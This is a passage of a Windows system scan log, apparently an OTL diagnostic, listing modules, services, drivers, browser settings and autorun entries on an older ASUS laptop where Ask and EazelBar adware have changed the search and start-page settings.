05:45:33 | 000,397,312 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Wizard\2.0.3219.36937__90ba9c70f846762e\CLI.Component.Wizard.dll MOD - [2012.11.12 05:45:33 | 000,106,496 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\MOM.Implementation\2.0.3219.37076__90ba9c70f846762e\MOM.Implementation.dll MOD - [2012.11.12 05:45:33 | 000,069,632 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Runtime\2.0.3219.36918__90ba9c70f846762e\CLI.Component.Runtime.dll MOD - [2012.11.12 05:45:33 | 000,061,440 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOG.Foundation.Implementation\2.0.3219.37072__90ba9c70f846762e\LOG.Foundation.Implementation.dll MOD - [2012.11.12 05:45:33 | 000,053,248 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.SkinFactory\2.0.3219.36920__90ba9c70f846762e\CLI.Component.SkinFactory.dll MOD - [2012.11.12 05:45:33 | 000,045,056 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared.Private\2.0.3184.27505__90ba9c70f846762e\CLI.Component.Runtime.Shared.Private.dll MOD - [2012.11.12 05:45:33 | 000,045,056 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.Source.Kit.Server\2.0.3219.37103__90ba9c70f846762e\AEM.Plugin.Source.Kit.Server.dll MOD - [2012.11.12 05:45:33 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Foundation.Private\2.0.3184.27488__90ba9c70f846762e\CLI.Foundation.Private.dll MOD - [2012.11.12 05:45:33 | 000,032,768 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOG.Foundation.Private\2.0.3184.27493__90ba9c70f846762e\LOG.Foundation.Private.dll MOD - [2012.11.12 05:45:33 | 000,024,576 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared.Private\2.0.3184.27504__90ba9c70f846762e\CLI.Component.Wizard.Shared.Private.dll MOD - [2012.11.12 05:45:33 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOG.Foundation.Implementation.Private\2.0.3184.27510__90ba9c70f846762e\LOG.Foundation.Implementation.Private.dll MOD - [2012.11.12 05:45:33 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOCALIZATION.Foundation.Private\2.0.3184.27488__90ba9c70f846762e\LOCALIZATION.Foundation.Private.dll MOD - [2012.11.12 05:45:33 | 000,014,848 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll MOD - [2012.11.12 05:45:33 | 000,013,312 | ---- | M] () -- C:\Windows\assembly\GAC\Interop.WBOCXLib\1.0.0.0__90ba9c70f846762e\Interop.WBOCXLib.dll MOD - [2012.11.12 05:45:33 | 000,011,264 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOCALIZATION.Foundation.Implementation\2.0.3219.37116__90ba9c70f846762e\LOCALIZATION.Foundation.Implementation.dll MOD - [2012.11.12 05:45:33 | 000,007,168 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Runtime.Extension.EEU\2.0.3219.36917__90ba9c70f846762e\CLI.Component.Runtime.Extension.EEU.dll MOD - [2012.11.12 05:45:32 | 001,077,248 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Dashboard\2.0.3219.36926__90ba9c70f846762e\CLI.Component.Dashboard.dll MOD - [2012.11.12 05:45:32 | 000,073,728 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\ATIDEMOS\2.0.3219.36919__90ba9c70f846762e\ATIDEMOS.dll MOD - [2012.11.12 05:45:32 | 000,057,344 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\APM.Server\2.0.3219.36914__90ba9c70f846762e\APM.Server.dll MOD - [2012.11.12 05:45:32 | 000,045,056 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Server\2.0.3219.36916__90ba9c70f846762e\AEM.Server.dll MOD - [2012.11.12 05:45:32 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Client.Shared.Private\2.0.3184.27496__90ba9c70f846762e\CLI.Component.Client.Shared.Private.dll MOD - [2012.11.12 05:45:32 | 000,032,768 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\ATICCCom\2.0.0.0__90ba9c70f846762e\ATICCCom.dll MOD - [2012.11.12 05:45:32 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CCC.Implementation\2.0.3219.37075__90ba9c70f846762e\CCC.Implementation.dll MOD - [2012.11.12 05:45:32 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared.Private\2.0.3184.27504__90ba9c70f846762e\CLI.Component.Dashboard.Shared.Private.dll MOD - [2012.11.12 05:45:32 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime.Shared.Private\2.0.3184.27521__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.Shared.Private.dll MOD - [2012.11.10 20:57:08 | 000,093,696 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\fzshellext.dll MOD - [2012.06.18 16:24:30 | 000,260,096 | ---- | M] () -- C:\Program Files\Notepad++\NppShell_05.dll MOD - [2009.02.04 18:55:38 | 000,548,864 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe MOD - [2008.10.24 14:13:02 | 000,159,744 | ---- | M] () -- C:\Windows\System32\atitmmxx.dll MOD - [2008.10.23 19:21:32 | 000,016,384 | R--- | M] () -- C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll MOD - [2008.07.27 19:03:08 | 000,434,176 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\System.Windows.Forms.resources\2.0.0.0_de_b77a5c561934e089\System.Windows.Forms.resources.dll MOD - [2008.07.27 19:03:08 | 000,315,392 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_de_b77a5c561934e089\mscorlib.resources.dll MOD - [2007.11.30 20:20:44 | 000,051,768 | ---- | M] () -- C:\Program Files\ASUS\ASUS Live Update\ALU.exe MOD - [2007.06.15 19:28:36 | 000,147,456 | ---- | M] () -- C:\Program Files\ASUS\ASUS Data Security Manager\OverlayIconShlExt.dll MOD - [2007.06.02 02:08:18 | 000,143,360 | ---- | M] () -- C:\Program Files\ASUS\ASUS Data Security Manager\OverlayIconShlExt1.dll ========== Services (SafeList) ========== SRV - [2013.02.27 18:13:12 | 000,251,248 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2013.02.20 16:20:57 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2013.02.12 17:16:48 | 000,086,752 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService) SRV - [2013.02.12 17:16:13 | 000,565,472 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE -- (AntiVirWebService) SRV - [2013.02.12 17:16:11 | 000,110,816 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService) SRV - [2013.02.12 07:48:04 | 000,587,912 | ---- | M] (Crawler.com) [Auto | Running] -- C:\Program Files\Spyware Terminator\st_rsser.exe -- (ST2012_Svc) SRV - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8) SRV - [2012.10.19 16:56:30 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate) SRV - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2012.06.13 13:32:04 | 000,222,720 | ---- | M] () [Auto | Running] -- C:\Program Files\EazelBar\ToolbarUpdaterService.exe -- (Updater Service for EazelBar) SRV - [2009.03.24 09:45:58 | 000,127,656 | ---- | M] (Samsung Electronics CO., LTD.) [On_Demand | Stopped] -- C:\Windows\System32\SUPDSvc.exe -- (Samsung UPD Service) SRV - [2008.03.31 11:55:48 | 000,225,280 | ---- | M] (ASUSTek Computer Inc.) [Auto | Running] -- C:\Program Files\ASUS\ASUS Data Security Manager\ADSMSrv.exe -- (ADSMService) SRV - [2008.01.21 03:23:32 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\mpsvc.dll -- (WinDefend) SRV - [2007.08.08 09:08:40 | 000,094,208 | ---- | M] () [Auto | Running] -- C:\Program Files\ATKGFNEX\GFNEXSrv.exe -- (ATKGFNEXSrv) ========== Driver Services (SafeList) ========== DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp) DRV - File not found [Kernel | Auto | Stopped] -- C:\Windows\system32\Drivers\DgiVecp.sys -- (DgiVecp) DRV - [2012.12.12 19:02:42 | 000,134,336 | ---- | M] (Avira Operations GmbH & Co. KG) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb) DRV - [2012.12.12 19:02:42 | 000,083,944 | ---- | M] (Avira Operations GmbH & Co. KG) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt) DRV - [2012.11.13 17:12:34 | 000,036,552 | ---- | M] (Avira Operations GmbH & Co. KG) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr) DRV - [2012.08.27 15:50:24 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv) DRV - [2011.06.21 11:24:06 | 000,032,768 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\sp_rsdrv2.sys -- (sp_rsdrv2) DRV - [2008.11.10 15:00:54 | 000,005,120 | ---- | M] (Samsung Electronics) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\SSPORT.SYS -- (SSPORT) DRV - [2008.10.24 17:16:32 | 004,017,152 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag) DRV - [2008.08.11 03:14:12 | 001,752,704 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC) DRV - [2008.06.03 07:41:52 | 000,015,928 | ---- | M] ( ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\kbfiltr.sys -- (kbfiltr) DRV - [2008.05.29 19:21:02 | 000,015,416 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [File_System | Boot | Running] -- C:\Windows\System32\drivers\lullaby.sys -- (lullaby) DRV - [2008.05.02 09:07:54 | 000,048,128 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SiSGB6.sys -- (SiSGbeLH) DRV - [2008.04.27 20:07:44 | 000,909,824 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\athr.sys -- (athr) DRV - [2007.08.11 05:19:26 | 000,029,752 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [File_System | Boot | Running] -- C:\Windows\System32\drivers\AsDsm.sys -- (AsDsm) DRV - [2007.07.24 20:09:04 | 000,013,880 | ---- | M] () [Kernel | Auto | Running] -- C:\Program Files\ATKGFNEX\ASMMAP.sys -- (ASMMAP) DRV - [2006.12.14 08:11:58 | 000,007,680 | ---- | M] (ATK0100) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ATKACPI.sys -- (MTsensor) DRV - [2006.11.02 08:41:49 | 001,010,560 | ---- | M] (Motorola Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\smserial.sys -- (smserial) ========== Standard Registry (SafeList) ========== ========== Internet Explorer ========== IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.asus.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?} IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.asus.com IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.eazel.com?id=A8753F0C2B594A0DB594C667F621AFEB IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\..\URLSearchHook: {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) IE - HKCU\..\URLSearchHook: {16CC3586-3547-4025-9E2F-F04C365D8B90} - No CLSID value found IE - HKCU\..\SearchScopes,DefaultScope = {16CC3586-3547-4025-9E2F-F04C365D8B90} IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?} IE - HKCU\..\SearchScopes\{16CC3586-3547-4025-9E2F-F04C365D8B90}: "URL" = hxxp://search.eazel.com/results.php?cat=web&co=&lg=en&q={searchTerms} IE - HKCU\..\SearchScopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E}: "URL" = hxxp://websearch.ask.com/redirect?client=ie&tb=AVR-4&o=APN10261&src=crm&q={searchTerms}&locale=de_DE&apn_ptnrs=^AGS&apn_dtid=^YYYYYY^YY^DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local ========== FireFox ========== FF - prefs.js..browser.search.defaultengine: "Ask.com" FF - prefs.js..browser.search.defaultenginename: "Ask.com" FF - prefs.js..browser.search.order.1: "Ask.com" FF - prefs.js..browser.search.selectedEngine: "Ask.com" FF - prefs.js..extensions.enabledAddons: seostatus%40rubyweb:1.5.9 FF - prefs.js..extensions.enabledAddons: %7Bc2b1f3ae-5cd5-49b7-8a0c-2c3bcbbbb294%7D:1.1 FF - prefs.js..extensions.enabledAddons: %7B81BF1D23-5F17-408D-AC6B-BD6DF7CAF670%7D:7.6.0.2 FF - prefs.js..extensions.enabledAddons: %7Bb9db16a4-6edc-47ec-a1f4-b86292ed211d%7D:4.9.14 FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:19.0 FF - prefs.js..keyword.URL: "hxxp://websearch.ask.com/redirect?client=ff&src=kw&tb=AVR-4&o=APN10261&locale=de_DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_ptnrs=%5EAGS&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7&apn_dtid=%5EYYYYYY%5EYY%5EDE&&q=" FF - user.js - File not found FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_6_602_171.dll () FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll () FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.4: C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}: C:\Program Files\Common Files\DVDVideoSoft\plugins\ff\ [2012.12.31 16:40:15 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{EBD839AE-B08C-4fb7-859B-F54AF16C159F}: C:\Program Files\EazelBar\Firefox [2013.02.03 14:39:43 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 19.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.20 16:20:59 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 19.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.02.20 00:21:20 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 19.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.20 16:20:59 | 000,000,000 | ---D | M] FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 19.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.02.20 00:21:20 | 000,000,000 | ---D | M] FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2012.11.12 18:13:30 | 000,000,000 | ---D | M] (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\Extensions [2013.02.23 17:26:11 | 000,000,000 | ---D | M] (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions [2012.12.10 22:11:07 | 000,000,000 | ---D | M] (iMacros for Firefox) -- C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions\{81BF1D23-5F17-408D-AC6B-BD6DF7CAF670} [2013.02.23 17:26:11 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2012.11.17 13:08:12 | 000,207,020 | ---- | M] () (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\firefox\profiles\v1trl7q1.default\extensions\seostatus@rubyweb.xpi [2012.12.08 15:56:43 | 000,003,170 | ---- | M] () (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\firefox\profiles\v1trl7q1.default\extensions\{c2b1f3ae-5cd5-49b7-8a0c-2c3bcbbbb294}.xpi [2013.02.20 16:20:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\mozilla firefox\extensions [2013.02.20 16:20:59 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2012.10.24 23:03:12 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml [2012.10.24 23:03:11 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml [2012.10.24 23:03:12 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml [2012.10.24 23:03:12 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml [2012.10.24 23:03:12 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml [2012.10.24 23:03:11 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml O1 HOSTS File: ([2006.09.18 22:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O2 - BHO: (EazelBar Helper) - {FE478DC2-E4AD-4197-8F80-5E456BEBC57F} - C:\Program Files\EazelBar\Toolbar32.dll () O3 - HKLM\..\Toolbar: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O3 - HKLM\..\Toolbar: (EazelBar) - {EBD839AE-B08C-4fb7-859B-F54AF16C159F} - C:\Program Files\EazelBar\Toolbar32.dll () O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [ADSMTray] C:\Program Files\ASUS\ASUS Data Security Manager\ADSMTray.exe (ASUSTek Computer Inc.) O4 - HKLM..\Run: [ApnUpdater] C:\Program Files\Ask.com\Updater\Updater.exe (Ask) O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) O4 - HKLM..\Run: [ASUS Camera ScreenSaver] C:\Windows\AsScrProlog.exe () O4 - HKLM..\Run: [ASUS Screen Saver Protector] C:\Windows\ASScrPro.exe () O4 - HKLM..\Run: [ASUSTPE] C:\Windows\System32\ASUSTPE.exe (ASUS) O4 - HKLM..\Run: [ATKMEDIA] C:\Program Files\ASUS\ATK Media\DMedia.exe (ASUS) O4 - HKLM..\Run: [ATKOSD2] C:\Program Files\ASUS\ATKOSD2\ATKOSD2.exe (ASUS) O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG) O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor) O4 - HKLM..\Run: [Samsung PanelMgr] C:\Windows\Samsung\PanelMgr\SSMMgr.exe () O4 - HKLM..\Run: [SpywareTerminatorShield] C:\Program Files\Spyware Terminator\SpywareTerminatorShield.exe (Crawler.com) O4 - HKLM..\Run: [SpywareTerminatorUpdater] C:\Program Files\Spyware Terminator\SpywareTerminatorUpdate.exe (Crawler.com) O4 - HKLM..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe (Advanced Micro Devices, Inc.) O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation) O4 - HKLM..\Run: [Zshutdown] c:\Preload\patch\sysprep.cmd File not found O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm () O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.) O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000005 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000006 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000020 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O13 - gopher Prefix: missing O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.0.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D28BF24E-DC37-418C-A805-E3550CD0B445}: DhcpNameServer = 192.168.0.1 O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Windows\ASUS\wallpapers\ASUS.jpg O24 - Desktop BackupWallPaper: C:\Windows\ASUS\wallpapers\ASUS.jpg O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0 ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1 ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - Adobe Flash Player 9 ActiveX ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: 